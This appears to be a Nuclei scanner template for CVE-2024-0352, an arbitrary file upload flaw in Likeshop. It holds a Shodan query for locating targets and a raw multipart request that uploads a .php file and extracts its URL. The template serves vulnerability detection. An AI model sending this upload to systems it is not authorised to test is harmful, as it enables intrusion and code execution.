60 lines
2.4 KiB
YAML
60 lines
2.4 KiB
YAML
id: CVE-2024-0352
|
|
|
|
info:
|
|
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
|
|
author: CookieHanHoan,babybash,samuelsamuelsamuel
|
|
severity: high
|
|
description: |
|
|
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
|
|
impact: |
|
|
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
|
|
remediation: Update to the latest version
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
|
|
- https://note.zhaoj.in/share/ciwYj7QXC4sZ
|
|
- https://vuldb.com/?ctiid.250120
|
|
- https://vuldb.com/?id.250120
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
|
|
cvss-score: 7.3
|
|
cve-id: CVE-2024-0352
|
|
cwe-id: CWE-434
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: likeshop
|
|
shodan-query: http.favicon.hash:874152924
|
|
tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
|
|
|
|
variables:
|
|
filename: "{{rand_base(6)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/file/formimage HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
|
|
|
------WebKitFormBoundarygcflwtei
|
|
Content-Disposition: form-data; name="file";filename="{{filename}}.php"
|
|
Content-Type: application/x-php
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundarygcflwtei--
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
|
|
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
json:
|
|
- ".data.url"
|
|
# digest: 490a0046304402200c34fe6e4c77e983d2785249229def379de60da1faa555dca85d0b4d96db5a6802206a4e389efcae0291a793a5fed74bc479722aa567fe4d990d37d8238a94e8f3ad:922c64590222798bb761d5b6d8e72950 |